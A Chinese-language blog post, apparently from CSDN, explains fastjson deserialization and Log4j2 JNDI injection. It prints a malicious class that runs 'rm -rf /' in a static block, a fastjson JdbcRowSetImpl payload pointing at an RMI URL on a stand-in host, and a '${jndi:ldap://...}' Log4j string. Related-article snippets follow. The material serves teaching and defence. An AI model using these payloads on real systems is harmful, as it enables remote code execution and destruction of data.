fastJson反序列化漏洞和log4j漏洞

已于 2023-07-19 18:43:23 修改
阅读量1.1k 收藏
点赞数
文章标签: log4j java jndi
于 2023-07-19 18:36:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27275851/article/details/131814934
版权
文章介绍了两种Java环境下的安全风险:一是通过fastJson的序列化漏洞,攻击者利用rmi服务端创建恶意class进行注入;二是Log4j2.x低于2.14.1版本时,JNDILDAP注入风险,攻击者通过ldap服务器引导加载远程恶意class。这两种攻击都可能导致静态代码块被执行,影响系统安全。
摘要由CSDN通过智能技术生成

有 attach.class (编译好的文件)

static{
	Runtime.getRuntime().exec("rm -rf /");
}

1.rmi注入

攻击者建立rmi服务端,于rmi服务端建造一系列攻击对象 ,假设远程地址为 http://abc,可url链接到恶意class-attach.class

若被攻击者访问到此服务 rmi://abc/attach.class ,静态代码块会优先加载,无需构造对象。

fastJson通过序列化漏洞 fastJson<=1.2.47 (高版本添加了序列化白名单和黑名单)

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://abc/attach.class",
        "autoCommit":true
    }
}

在调用JSON.parse()时,若序列化字符串里为上述字符串,则会自动将JdbcRowSetImpl 的 dataSourceName链接改为 rmi远程地址并访问。

2.LDAP注入

JDK < 8u191
高版本需要设置参数才可开启漏洞

        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

Log4j2.x<=2.14.1

JNDI(Java Naming and Directory Interface)是Java平台中的一种API,用于访问命名和目录服务

攻击者搭建 一个 ldap服务器(如marshalsec)假设远程地址为 http://abc,可url链接到恶意class-attach.class

str="${jndi:ldap://abc/attach.class}";
logger.error(str);//logger.info(str);

会根据表达式去寻找对应的目录

若被攻击者访问到此服务 jndi:ldap://abc/attach.class ,静态代码块会优先加载,无需构造对象。

若在attach.class使用dnslog即可完全控制web应用

http://www.dnslog.cn/
这样の我
关注
从源码看Log4j2、FastJson漏洞
wdj_yyds的博客
12-31 4579
前言 远程代码漏洞对广大程序员来并不陌生,远程代码执行是指攻击者可能会通过远程调用的方式来攻击或控制计算机设备,无论该设备在哪里。如果远程代码执行的是一个死循环那服务器的CPU不得美滋滋了。 前段时间,Java 界的知名日志框架 Log4j2 发现了远程代码执行漏洞漏洞风暴席卷各大公司,编程届异常火热(加班),我们是万万没想到那么牛逼的日志框架有BUG。 这次安全漏洞也有个小插曲,我司的员工发现了漏洞,上报了Apache没告知GXB,我司也受到了处罚,希望下次引以为戒,不过这事程序员不背锅,管理下次
Fastjson 反序列化漏洞复现
迷风小白
04-14 5312
Fastjson 反序列化漏洞复现 前言 因为之前并没有遇到过fastjson相关的漏洞,刚好这次有机会碰到了就顺便学习一下并记录自己踩过的坑。 漏洞原理 漏洞复现 这里漏洞环境主要是用vulhub上的两个fastjson漏洞搭建,搭建完成以后访问8090端口会出现如下所示 漏洞利用需要我们在vps上启一个RMI服务并调用class文件,这些我们都可以在一台服务器上完成。 首先我们先创建命令执行...
信息打点-语言框架&开发组件&FastJson&Shiro&Log4j&SpringBoot等
今天是几号的博客
03-31 984
后端CMS:一般PHP开发居多源码程序(利用源码程序名去搜漏洞情况,源码去下载进行后期的代码审计)前端js 框架(爬取更多的js从里面筛选URL或敏感泄漏key等)也是可以通过对js代码逻辑进行代码审计组件java居多,第三方的功能模块(日志记录,数据监控,数据转换等)常见有过安全漏洞组件(shiro solr log4j sprintboot等)框架php java python都有简单代码的一个整合库,如果使用框架就只需要学习使用框架调用即可。
Log4jFastjson RCE漏洞认识jndi注入
最新发布
道阻且长,行则将至。
06-10 1612
本文学习了 JNDI 基本概念和 JNDI 注入的基本原理,并通过靶场实践 JNDI 注入漏洞的利用过程,与此同时学习了 Log4j RCE 漏洞(CVE-2021-44228)和 Fastjson 反序列化漏洞(CVE-2017-18349)的原理,并通过靶场实践借助 JNDI 注入完成 RCE 的过程。
JNDI注入&Log4j&FastJson&白盒审计&不回显处理
qq_46081990的博客
12-19 1807
本文介绍了JNDI的概念和作用,以及LDAP和RMI两个常用的协议,Log4j / FastJson 简介及其Maven仓库配置,着重介绍了漏洞利用,以迷你天猫购物项目 Tmall 做了 Log4j / FastJson 漏洞的代码审计,最后介绍了不回显情况的处理方法。
log4j2 2.17.1又来了,这节奏简直吊打去年的fastjson?让它再飞一会儿
m0_62051288的博客
12-30 3248
就在2.17.0发布过去一周,2.17.1又来了,官方发版截图如下!最近因为安全问题,log4j2一连发布数个版本,这节奏简直可以吊打去年的fastjson了: 但是,请不要惊慌!不用被信息轰炸!不要急着紧急版本升级!抽根烟,压压惊,没什么大不了! 让我们分析一下官方对这个漏洞的总结,原文如下所示,也就是说,需要攻击者能够控制log4j2的配置文件。这个条件就比较苛刻了。一般我们的应用都部署在服务器上,能修改配置文件的,除了运维同学,我想不到还有谁能做这个事情: 再来看一下官方对这个安全漏洞的详细
Spring boot2 项目配置log4j2,druid连接池和fastjson(一)
heheyixiao233的博客
12-28 1408
以前自己练手项目,没有配置好log4j和druid连接池,工作的项目发现工程中虽然引入了fastjson,但没有生效,还是要用jackson。这段时间,自己要搭建一个练手项目,现在逻辑不是重点,重点是一些不会的东西。 网上的资料很多,但坑也非常多,正好记录一下最近遇到的坑。在本文最后,我会贴出参考文章的地址。 里面一些细节我其实也不太懂,都是复制粘贴来,只保证能跑,不保证最优。如果有问题,请大神指...
Java小姿势】Log4j2漏洞的前世今生
行雨斋
12-20 2937
A.源起 2021年12月9日,各大公司都被一个重量级漏洞引爆了,该漏洞一旦被攻击者利用就会造成及其严重的影响。经过快速分析和确认,该漏洞影响范围极其广泛,危害极其严重。然后从10日凌晨开始很多公司的程序员都被迫开始应急相应,加班加点修复问题。该漏洞涉及包含但不限于Struts2、Flink、ElasticSearch、Druid、dubbo、Redis、kafka等常用应用和组件。 爆出这个漏洞的这就是大名鼎鼎的日志组件log4j2 。作为日志组件,在java领域基本上是再常见运用不过的了,而这个漏洞可以
反序列化漏洞汇总
hackzkaq的博客
12-08 5205
一.反序列化的基本内容 类对象方法 类(Class): 用来描述具有相同的属性和方法的对象的集合。 它定义了该集合中每个对象所共有的属性和方法。对象是类的实例。 对象:通过类定义的数据结构实例。对象包括两个数据成员(类变量和实例变量)和方法。 对象:某一个具体的事物、实体或事例 类是类型,比如人类,犬类; 对象是某种类的一个实例(实际的例子),比如身为人类的你就是一个对象,你家养的狗就属于犬类的一个对象,或者说一个实例; 你可能经常会听到“实例化对象”,这句话的意思就是创建对象,此处的实例名词作动词用,作名
JAVA反序列化漏洞(组件)
nigo134的博客
03-23 2204
weblogic:反序列化 Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。 漏洞检测: 可访问目录 /_async/AsyncResponseService /wls-w
fastjson<=1.2.47反序列化漏洞复现
DaWan
09-29 459
fastjson<=1.2.47反序列化漏洞复现环境搭建漏洞复现 环境搭建 漏洞复现 创建一个java类: TouchFile.java // javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime();
如何使log4j生成json格式的log
三劫散仙
09-15 9807
使用java开发项目时,log日志一般都是应用程序必不可少的一部分,大部分情况下我们的log文件都是普通的文本信息,通过level来标记不同级别的日志。 日志的目的,主要还是为了出现问题时有追踪的途径,方便从里面查出原因,在数据量小的时候通过linux上的各种shell命令如awk,grep就能快速查询或者做一些简单的统计,当数据量的时候,而且程序本身还是分布式的时候,这种方式就有点费劲。比
Fastjson反序列化漏洞原理与复现
FisrtBqy的博客
05-15 3585
Ffasjson反序列化漏洞原理与复现
安全学习_开发相关_Java第三方组件Log4j&FastJSON及相关安全问题简介
学废了的阿串的博客
09-29 2675
Java第三方组件,Log4j日志组件,jndi注入问题;Fastjson格式转换解析组件,转换数据时出现漏洞
JNDI注入--Log4j漏洞--Fastjson反序列化漏洞
weixin_74985952的博客
09-21 411
Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2463
log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞
《Kali安全渗透高级工程师》安全漏洞总结
君逍遥o
05-17 405
安全漏洞总结
从0入门JNDI注入
遇事不决冲冲冲
03-07 3081
先给本文立个框架 1. jndi介绍 2. RMI动态加载恶意类 3. jndi注入利用思路 4. RMI-JNDI注入 5. LDAP-JNDI注入 6. 版本及参考 JNDI全称为Java命名和目录接口。我们可以理解为JNDI提供了两个服务,即命名服务和目录服务。
JNDI RMI 注入(Log4j2漏洞
sun0322
12-24 9572
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
Fastjson是一款Java语言编写的高性能JSON处理器,被广泛应用于各种Java应用程序中。然而,Fastjson存在反序列化漏洞,黑客可以利用该漏洞实现远程代码执行,因此该漏洞被广泛利用。 检测Fastjson反序列化漏洞的方法: 1. 扫描源代码,搜索是否存在Fastjson相关的反序列化代码,如果存在,则需要仔细检查反序列化的过程是否安全。 2. 使用工具进行扫描:目前市面上有很多漏洞扫描工具已经支持Fastjson反序列化漏洞的检测,例如:AWVS、Nessus、Burp Suite等。 利用Fastjson反序列化漏洞的方法: 1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现文件读取操作。 3. 利用Fastjson反序列化漏洞实现反弹Shell:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现反弹Shell操作。 防范Fastjson反序列化漏洞的方法: 1. 更新Fastjson版本:Fastjson官方在1.2.46版本中修复了反序列化漏洞,建议使用该版本或更高版本。 2. 禁止使用Fastjson反序列化:如果应用程序中不需要使用Fastjson反序列化功能,建议禁止使用该功能,可以使用其他JSON处理器。 3. 输入验证:对所有输入进行校验和过滤,确保输入数据符合预期,避免恶意数据进入系统。 4. 序列化过滤:对敏感数据进行序列化过滤,确保敏感数据不会被序列化。 5. 安全加固:对系统进行安全加固,如限制系统权限、加强访问控制等,避免黑客利用Fastjson反序列化漏洞获取系统权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值